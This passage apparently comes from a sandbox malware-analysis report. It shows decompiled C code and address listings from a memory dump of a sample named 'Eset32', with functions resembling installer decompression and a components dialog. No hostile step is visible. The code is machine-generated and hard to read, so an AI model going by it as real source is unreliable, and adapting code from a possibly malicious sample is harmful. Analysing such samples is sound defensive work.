				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6a8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6a8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                          0x00407127
                                                          0x0040712f
                                                          0x00407133
                                                          0x00407135
                                                          0x00407138
                                                          0x0040713a
                                                          0x0040713a
                                                          0x0040713c
                                                          0x00407143
                                                          0x00407145
                                                          0x00407145
                                                          0x0040714b
                                                          0x00407160
                                                          0x00407168
                                                          0x0040716a
                                                          0x0040716c
                                                          0x0040716f
                                                          0x00407170
                                                          0x00407170
                                                          0x00407176
                                                          0x00000000
                                                          0x00000000
                                                          0x00407178
                                                          0x0040717b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717b
                                                          0x0040717f
                                                          0x00407182
                                                          0x00407184
                                                          0x00407184
                                                          0x00407187
                                                          0x0040718d
                                                          0x0040718e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040718e
                                                          0x00407193
                                                          0x00407196
                                                          0x00407198
                                                          0x00407198
                                                          0x0040719e
                                                          0x004071a0
                                                          0x004071b1
                                                          0x004071a4
                                                          0x004071a8
                                                          0x0040744d
                                                          0x00000000
                                                          0x0040744d
                                                          0x004071ae
                                                          0x004071af
                                                          0x004071af
                                                          0x004071b7
                                                          0x004071ba
                                                          0x004071be
                                                          0x004071c0
                                                          0x004071c2
                                                          0x004071c5
                                                          0x00000000
                                                          0x00000000
                                                          0x004071cd
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d7
                                                          0x004071d8
                                                          0x004071ed
                                                          0x004071ed
                                                          0x004071f0
                                                          0x004071f2
                                                          0x004071f2
                                                          0x004071f4
                                                          0x004071f9
                                                          0x004071fb
                                                          0x00407202
                                                          0x00407204
                                                          0x0040720c
                                                          0x0040720c
                                                          0x0040720e
                                                          0x0040720f
                                                          0x0040721e
                                                          0x00407222
                                                          0x00407226
                                                          0x00407229
                                                          0x0040722c
                                                          0x00407231
                                                          0x00407234
                                                          0x0040723a
                                                          0x00407241
                                                          0x00407247
                                                          0x00407440
                                                          0x00407440
                                                          0x00407445
                                                          0x00407454
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407445
                                                          0x00407254
                                                          0x00407257
                                                          0x0040725a
                                                          0x0040725d
                                                          0x00407261
                                                          0x00000000
                                                          0x00000000
                                                          0x0040726c
                                                          0x0040726f
                                                          0x00407270
                                                          0x00407272
                                                          0x00407278
                                                          0x0040727b
                                                          0x00000000
                                                          0x00000000
                                                          0x00407281
                                                          0x00407282
                                                          0x00407285
                                                          0x00407288
                                                          0x0040728b
                                                          0x00407291
                                                          0x00407293
                                                          0x00407293
                                                          0x0040729b
                                                          0x0040729f
                                                          0x004072a4
                                                          0x004072c9
                                                          0x004072cf
                                                          0x004072d1
                                                          0x004072d3
                                                          0x004072d6
                                                          0x004072df
                                                          0x00000000
                                                          0x00000000
                                                          0x004072a6
                                                          0x004072a6
                                                          0x004072af
                                                          0x004072b3
                                                          0x00000000
                                                          0x00000000
                                                          0x004072c4
                                                          0x004072c4
                                                          0x004072c7
                                                          0x00000000
                                                          0x00000000
                                                          0x004072b7
                                                          0x004072ba
                                                          0x004072bc
                                                          0x004072c0
                                                          0x00000000
                                                          0x00000000
                                                          0x004072c2
                                                          0x004072c2
                                                          0x00000000
                                                          0x004072c4
                                                          0x004072e8
                                                          0x004072ee
                                                          0x004072f8
                                                          0x004072fa
                                                          0x004072ff
                                                          0x00407301
                                                          0x00407337
                                                          0x00407303
                                                          0x00407303
                                                          0x00407306
                                                          0x00407309
                                                          0x00407313
                                                          0x00407316
                                                          0x0040731d
                                                          0x00407328
                                                          0x0040732f
                                                          0x0040732f
                                                          0x00407339
                                                          0x0040733c
                                                          0x0040733e
                                                          0x00407344
                                                          0x00407344
                                                          0x0040734d
                                                          0x00407350
                                                          0x00407355
                                                          0x00407364
                                                          0x0040736c
                                                          0x00407371
                                                          0x00407395
                                                          0x0040739d
                                                          0x004073a1
                                                          0x004073a7
                                                          0x00407373
                                                          0x00407381
                                                          0x00407384
                                                          0x0040738a
                                                          0x0040738a
                                                          0x004073ab
                                                          0x00407366
                                                          0x00407366
                                                          0x00407366
                                                          0x004073bc
                                                          0x004073c0
                                                          0x004073cc
                                                          0x004073c7
                                                          0x004073ca
                                                          0x004073ca
                                                          0x004073d4
                                                          0x004073d9
                                                          0x004073e1
                                                          0x004073dd
                                                          0x004073df
                                                          0x004073df
                                                          0x004073e7
                                                          0x004073e9
                                                          0x004073f0
                                                          0x004073fa
                                                          0x00407404
                                                          0x00407420
                                                          0x00407424
                                                          0x00407269
                                                          0x0040726f
                                                          0x00407270
                                                          0x00407272
                                                          0x00407278
                                                          0x0040727b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040727b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407406
                                                          0x00407406
                                                          0x00407406
                                                          0x0040740b
                                                          0x00407414
                                                          0x0040741d
                                                          0x00000000
                                                          0x0040741d
                                                          0x0040742a
                                                          0x0040742a
                                                          0x0040742d
                                                          0x00407434
                                                          0x00407437
                                                          0x00000000
                                                          0x0040725a
                                                          0x004071da
                                                          0x004071dc
                                                          0x004071dc
                                                          0x004071e0
                                                          0x004071e3
                                                          0x004071e4
                                                          0x004071e4
                                                          0x00000000
                                                          0x004071dc
                                                          0x00407150
                                                          0x00407156
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                          • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                          • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                          • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404B80 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f468;
				_v28 =  *0x42f434 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f43d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404ACE(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a874;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a888;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a874 = 0;
								 *0x42a888 = 0;
								 *0x42f4a0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404B4E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a888;
									_t206 =  *0x42f468;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f46c <= 0) {
										L86:
										if( *0x42f42c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ebfc; // 0x4ab049
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f46c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a888);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4a0 = _a4;
					_v20 = 2;
					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a87c =  *0x42a87c | 0xffffffff;
					_v16 = _t264;
					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a874 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E0040417B(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E0040417B(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f46c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a888 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a888 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f46c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004041B0(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004041B0(_v12);
								L93:
								return E004041E2(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                          0x00404b9e
                                                          0x00404ba6
                                                          0x00404bae
                                                          0x00404bb4
                                                          0x00404bcc
                                                          0x00404bcf
                                                          0x00404bd0
                                                          0x00404dfd
                                                          0x00404e04
                                                          0x00404e18
                                                          0x00404e06
                                                          0x00404e08
                                                          0x00404e0b
                                                          0x00404e0c
                                                          0x00404e13
                                                          0x00404e13
                                                          0x00404e24
                                                          0x00404e32
                                                          0x00404e35
                                                          0x00404e4b
                                                          0x00404ec0
                                                          0x00404ec3
                                                          0x00404ec5
                                                          0x00404ecf
                                                          0x00404edd
                                                          0x00404edd
                                                          0x00404edf
                                                          0x00404ee9
                                                          0x00404eef
                                                          0x00404ef2
                                                          0x00404ef5
                                                          0x00404f10
                                                          0x00404ef7
                                                          0x00404f01
                                                          0x00404f01
                                                          0x00404ef5
                                                          0x00404ee9
                                                          0x00000000
                                                          0x00404ec3
                                                          0x00404e50
                                                          0x00404e5b
                                                          0x00404e60
                                                          0x00404e67
                                                          0x00404e6c
                                                          0x00404e70
                                                          0x00404e7b
                                                          0x00404e7b
                                                          0x00404e7f
                                                          0x00404e83
                                                          0x00404e87
                                                          0x00404e9a
                                                          0x00404e89
                                                          0x00404e89
                                                          0x00404e90
                                                          0x00404e96
                                                          0x00404e92
                                                          0x00404e92
                                                          0x00404e92
                                                          0x00404e90
                                                          0x00404e9e
                                                          0x00404ea0
                                                          0x00404eb3
                                                          0x00404eb6
                                                          0x00404eb9
                                                          0x00404eb9
                                                          0x00404e83
                                                          0x00000000
                                                          0x00404e70
                                                          0x00404e52
                                                          0x00404e59
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404f13
                                                          0x00404f13
                                                          0x00404f1a
                                                          0x00404f8b
                                                          0x00404f93
                                                          0x00404f9b
                                                          0x00404f9b
                                                          0x00404fa4
                                                          0x00404fa6
                                                          0x00404fad
                                                          0x00404fb0
                                                          0x00404fb0
                                                          0x00404fb6
                                                          0x00404fbd
                                                          0x00404fc0
                                                          0x00404fc0
                                                          0x00404fc6
                                                          0x00404fcc
                                                          0x00404fd2
                                                          0x00404fd2
                                                          0x00404fdf
                                                          0x0040513f
                                                          0x00405146
                                                          0x00405163
                                                          0x00405169
                                                          0x0040517b
                                                          0x0040517b
                                                          0x00000000
                                                          0x00404fe5
                                                          0x00404fe7
                                                          0x00404fec
                                                          0x00404ff1
                                                          0x00404ff6
                                                          0x00404ff8
                                                          0x00404ff8
                                                          0x00404ff9
                                                          0x00404ffa
                                                          0x00404ffc
                                                          0x00404ffc
                                                          0x00405004
                                                          0x00405045
                                                          0x00405047
                                                          0x00405057
                                                          0x0040505a
                                                          0x0040505f
                                                          0x00405066
                                                          0x00405069
                                                          0x0040510b
                                                          0x00405113
                                                          0x0040511b
                                                          0x0040511b
                                                          0x00405121
                                                          0x00405129
                                                          0x0040513a
                                                          0x0040513a
                                                          0x00000000
                                                          0x00405129
                                                          0x0040506f
                                                          0x00405072
                                                          0x00405078
                                                          0x0040507d
                                                          0x0040507f
                                                          0x00405081
                                                          0x00405087
                                                          0x0040508e
                                                          0x00405093
                                                          0x0040509a
                                                          0x0040509d
                                                          0x0040509d
                                                          0x004050a4
                                                          0x004050b0
                                                          0x004050b4
                                                          0x004050b6
                                                          0x004050b6
                                                          0x004050a6
                                                          0x004050a8
                                                          0x004050a8
                                                          0x004050d6
                                                          0x004050e2
                                                          0x004050f1
                                                          0x004050f1
                                                          0x004050f3
                                                          0x004050f6
                                                          0x004050ff
                                                          0x00000000
                                                          0x00405006
                                                          0x00405011
                                                          0x00405014
                                                          0x00405019
                                                          0x0040501b
                                                          0x0040501f
                                                          0x0040502f
                                                          0x00405039
                                                          0x0040503b
                                                          0x0040503e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405021
                                                          0x00405021
                                                          0x00405027
                                                          0x00405029
                                                          0x00405029
                                                          0x0040502a
                                                          0x0040502b
                                                          0x00000000
                                                          0x00405021
                                                          0x00405004
                                                          0x00404fdf
                                                          0x00404f22
                                                          0x00000000
                                                          0x00404f38
                                                          0x00404f42
                                                          0x00404f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00404f59
                                                          0x00404f5e
                                                          0x00404f6a
                                                          0x00404f6a
                                                          0x00404f6c
                                                          0x00404f7b
                                                          0x00404f7d
                                                          0x00404f81
                                                          0x00404f84
                                                          0x00000000
                                                          0x00404f84
                                                          0x00404f22
                                                          0x00404bd6
                                                          0x00404bd9
                                                          0x00404bdc
                                                          0x00404bec
                                                          0x00404bff
                                                          0x00404c0a
                                                          0x00404c10
                                                          0x00404c1e
                                                          0x00404c31
                                                          0x00404c36
                                                          0x00404c41
                                                          0x00404c4a
                                                          0x00404c60
                                                          0x00404c70
                                                          0x00404c7c
                                                          0x00404c7c
                                                          0x00404c81
                                                          0x00404c87
                                                          0x00404c89
                                                          0x00404c8c
                                                          0x00404c91
                                                          0x00404c96
                                                          0x00404c98
                                                          0x00404c98
                                                          0x00404cb8
                                                          0x00404cb8
                                                          0x00404cba
                                                          0x00404cbb
                                                          0x00404cc0
                                                          0x00404cc6
                                                          0x00404cca
                                                          0x00404ccf
                                                          0x00404cd7
                                                          0x00404cdb
                                                          0x00404ce0
                                                          0x00404ce5
                                                          0x00404ced
                                                          0x00404cf0
                                                          0x00404dbf
                                                          0x00404dd2
                                                          0x00000000
                                                          0x00404cf6
                                                          0x00404cf9
                                                          0x00404cfc
                                                          0x00404cff
                                                          0x00404cff
                                                          0x00404d04
                                                          0x00404d0d
                                                          0x00404d10
                                                          0x00404d14
                                                          0x00404d17
                                                          0x00404d1a
                                                          0x00404d23
                                                          0x00404d2c
                                                          0x00404d2f
                                                          0x00404d32
                                                          0x00404d35
